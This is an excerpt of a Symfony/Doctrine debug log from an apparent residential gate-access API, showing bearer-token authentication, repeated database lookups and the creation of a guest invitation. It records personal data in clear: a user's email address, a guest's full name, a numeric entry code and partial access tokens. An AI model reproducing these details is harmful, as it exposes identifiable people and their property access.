  9222. [2025-12-21 00:50:28] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9223. [2025-12-21 00:50:28] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9224. [2025-12-21 00:50:28] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9225. [2025-12-21 00:50:28] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9226. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9227. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9228. [2025-12-21 00:50:28] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9229. [2025-12-21 00:50:28] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9230. [2025-12-21 00:50:28] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9231. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9232. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  9233. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9234. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? LIMIT 1 [15] []
  9235. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT i0_.id AS id_0, i0_.uuid AS uuid_1, i0_.status AS status_2, i0_.date_created AS date_created_3, i0_.date_modified AS date_modified_4, i0_.name AS name_5, i0_.last_name AS last_name_6, i0_.code AS code_7, i0_.image_code_path AS image_code_path_8, i0_.type AS type_9, i0_.subtype AS subtype_10, i0_.date_invitation AS date_invitation_11, i0_.date_start AS date_start_12, i0_.date_end AS date_end_13, i0_.event_id AS event_id_14, i0_.address_id AS address_id_15, i0_.user_id AS user_id_16 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) ORDER BY i0_.date_invitation DESC LIMIT 20 OFFSET 0 [274,1] []
  9236. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT count(i0_.id) AS sclr_0 FROM invitation i0_ WHERE (i0_.address_id = ?) AND (i0_.status = ?) [274,1] []
  9237. [2025-12-21 00:50:28] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9238. [2025-12-21 00:50:28] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9239. [2025-12-21 00:50:36] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9240. [2025-12-21 00:50:36] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9241. [2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9242. [2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9243. [2025-12-21 00:50:36] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9244. [2025-12-21 00:50:36] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9245. [2025-12-21 00:50:36] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9246. [2025-12-21 00:50:36] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9247. [2025-12-21 00:50:36] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9248. [2025-12-21 00:50:36] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9249. [2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9250. [2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9251. [2025-12-21 00:50:36] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9252. [2025-12-21 00:50:36] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9253. [2025-12-21 00:50:36] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9254. [2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9255. [2025-12-21 00:50:36] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9256. [2025-12-21 00:50:36] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9257. [2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9258. [2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9259. [2025-12-21 00:50:36] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  9260. [2025-12-21 00:50:36] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9261. [2025-12-21 00:50:57] request.INFO: Matched route "me_get". {"route":"me_get","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\MeController::meGETAction","domain":"api.unda.co","_route":"me_get"},"request_uri":"https://api.unda.co/me?fields=control_gate%2Caddress%2Cnotification_setting","method":"GET"} []
  9262. [2025-12-21 00:50:57] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9263. [2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9264. [2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9265. [2025-12-21 00:50:57] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9266. [2025-12-21 00:50:57] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9267. [2025-12-21 00:50:57] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9268. [2025-12-21 00:50:57] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9269. [2025-12-21 00:50:57] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9270. [2025-12-21 00:50:57] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9271. [2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9272. [2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9273. [2025-12-21 00:50:57] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9274. [2025-12-21 00:50:57] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9275. [2025-12-21 00:50:57] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9276. [2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9277. [2025-12-21 00:50:57] doctrine.DEBUG: SELECT c0_.id AS id_0, c0_.uuid AS uuid_1, c0_.status AS status_2, c0_.date_created AS date_created_3, c0_.date_modified AS date_modified_4, c0_.name AS name_5, c0_.residential_id AS residential_id_6, u1_.permission AS permission_7 FROM control_gate c0_ INNER JOIN user_has_control_gate u1_ ON ((u1_.control_gate_id = c0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9278. [2025-12-21 00:50:57] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9, u1_.permission AS permission_10, u1_.color AS color_11 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?) AND (u1_.status = ?)) LIMIT 10 OFFSET 0 [398,1] []
  9279. [2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.id_rule AS id_rule_7, t0.plate_rule AS plate_rule_8, t0.cp AS cp_9, t0.neighborhood AS neighborhood_10, t0.country AS country_11, t0.state AS state_12, t0.city AS city_13 FROM residential t0 WHERE t0.id = ? [15] []
  9280. [2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9281. [2025-12-21 00:50:57] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.other_user AS other_user_6, t0.news AS news_7, t0.new_events AS new_events_8, t0.invited_entry AS invited_entry_9, t0.invited_confirmation AS invited_confirmation_10, t0.user_id AS user_id_11, t0.address_id AS address_id_12, t0.control_gate_id AS control_gate_id_13 FROM notification_setting t0 WHERE t0.user_id = ? AND t0.address_id = ? LIMIT 1 [398,274] []
  9282. [2025-12-21 00:50:57] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9283. [2025-12-21 00:51:15] request.INFO: Matched route "invitation_create". {"route":"invitation_create","route_parameters":{"_controller":"Hona\\ApiBundle\\Controller\\InvitationController::invitationCreateAction","domain":"api.unda.co","_route":"invitation_create"},"request_uri":"https://api.unda.co/invitation/create","method":"POST"} []
  9284. [2025-12-21 00:51:15] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9285. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9286. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9287. [2025-12-21 00:51:15] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9288. [2025-12-21 00:51:15] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9289. [2025-12-21 00:51:15] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9290. [2025-12-21 00:51:15] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9291. [2025-12-21 00:51:15] security.DEBUG: Calling getCredentials() on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9292. [2025-12-21 00:51:15] security.DEBUG: Passing guard token information to the GuardAuthenticationProvider {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9293. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9294. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9295. [2025-12-21 00:51:15] security.INFO: Guard authentication successful! {"token":"[object] (Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken: PostAuthenticationGuardToken(user=\"carlosyadri25@gmail.com\", authenticated=true, roles=\"ROLE_USER\"))","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9296. [2025-12-21 00:51:15] security.DEBUG: Guard authenticator set no success response: request continues. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9297. [2025-12-21 00:51:15] security.DEBUG: Remember me skipped: it is not configured for the firewall. {"authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
  9298. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9299. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.status AS status_1, t0.date_created AS date_created_2, t0.date_modified AS date_modified_3, t0.user_id AS user_id_4, t0.address_id AS address_id_5, t0.parent_id AS parent_id_6, t0.permission AS permission_7, t0.color AS color_8, t0.rent AS rent_9 FROM user_has_address t0 WHERE t0.user_id = ? AND t0.address_id = ? AND t0.status = ? [398,274,1] []
  9300. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.uuid = ? LIMIT 1 ["914a4df2-219f-4106-974f-ce [...]"] []
  9301. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.uuid = ? LIMIT 1 ["c95c459d-212c-4555-98e9-59 [...]"] []
  9302. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT a0_.id AS id_0, a0_.uuid AS uuid_1, a0_.status AS status_2, a0_.date_created AS date_created_3, a0_.date_modified AS date_modified_4, a0_.name AS name_5, a0_.street AS street_6, a0_.outdoor_number AS outdoor_number_7, a0_.interior_number AS interior_number_8, a0_.residential_id AS residential_id_9 FROM address a0_ INNER JOIN user_has_address u1_ ON ((u1_.address_id = a0_.id) AND (u1_.user_id = ?)) WHERE (a0_.id = ?) AND (a0_.status = ?) LIMIT 1 [398,274,1] []
  9303. [2025-12-21 00:51:15] doctrine.DEBUG: "START TRANSACTION" [] []
  9304. [2025-12-21 00:51:15] doctrine.DEBUG: INSERT INTO invitation (uuid, status, date_created, date_modified, name, last_name, code, image_code_path, type, subtype, date_invitation, date_start, date_end, event_id, address_id, user_id) VALUES (?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?, ?) {"1":"572e256f-5aca-4b44-bfb4-61 [...]","2":1,"3":"2025-12-21 00:51:15","4":"2025-12-21 00:51:15","5":"Jorge","6":"Rodríguez","7":"320660","8":"/invitation/39923f13647556 [...]","9":"2","10":"1","11":"2025-12-21 19:30:00","12":null,"13":null,"14":null,"15":274,"16":398} []
  9305. [2025-12-21 00:51:15] doctrine.DEBUG: "COMMIT" [] []
  9306. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9307. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.street AS street_7, t0.outdoor_number AS outdoor_number_8, t0.interior_number AS interior_number_9, t0.residential_id AS residential_id_10 FROM address t0 WHERE t0.id = ? LIMIT 1 [274] []
  9308. [2025-12-21 00:51:15] security.DEBUG: Stored the security token in the session. {"key":"_security_bearer_presence"} []
  9309. [2025-12-21 00:51:15] request.INFO: Matched route "address_get_uuid_invitation". {"route":"address_get_uuid_invitation","route_parameters":{"size":"20","page":"0","_controller":"Hona\\ApiBundle\\Controller\\AddressController::addressInvitationGETAction","domain":"api.unda.co","uuid":"c95c459d-212c-4555-98e9-59cee00445e5","_route":"address_get_uuid_invitation"},"request_uri":"https://api.unda.co/address/c95c459d-212c-4555-98e9-59cee00445e5/invitation/20/0?order=desc","method":"GET"} []
  9310. [2025-12-21 00:51:15] security.DEBUG: Read existing security token from the session. {"key":"_security_bearer_presence","token_class":"Symfony\\Component\\Security\\Guard\\Token\\PostAuthenticationGuardToken"} []
  9311. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.client_id AS client_id_1, t0.token AS token_2, t0.expires_at AS expires_at_3, t0.scope AS scope_4, t0.user_id AS user_id_5, t0.data AS data_6 FROM access_token t0 WHERE t0.token = ? LIMIT 1 ["b0a4a4a06dc850d0f64ce4e341 [...]"] []
  9312. [2025-12-21 00:51:15] doctrine.DEBUG: SELECT t0.id AS id_1, t0.uuid AS uuid_2, t0.status AS status_3, t0.date_created AS date_created_4, t0.date_modified AS date_modified_5, t0.name AS name_6, t0.last_name AS last_name_7, t0.email AS email_8, t0.password AS password_9, t0.media_path AS media_path_10, t0.thumb_path AS thumb_path_11, t0.curp AS curp_12, t0.phone AS phone_13, t0.email_verification AS email_verification_14, t0.phone_verification AS phone_verification_15 FROM user t0 WHERE t0.id = ? LIMIT 1 [398] []
  9313. [2025-12-21 00:51:15] security.DEBUG: Cannot refresh token because user has changed. {"username":"carlosyadri25@gmail.com","provider":"Hona\\ApiBundle\\Security\\ApiUserProvider"} []
  9314. [2025-12-21 00:51:15] security.DEBUG: Token was deauthenticated after trying to refresh it. [] []
  9315. [2025-12-21 00:51:15] security.DEBUG: Checking for guard authentication credentials. {"firewall_key":"bearer_presence","authenticators":1} []
  9316. [2025-12-21 00:51:15] security.DEBUG: Checking support on guard authenticator. {"firewall_key":"bearer_presence","authenticator":"Hona\\ApiBundle\\Security\\ApiAuthenticator"} []
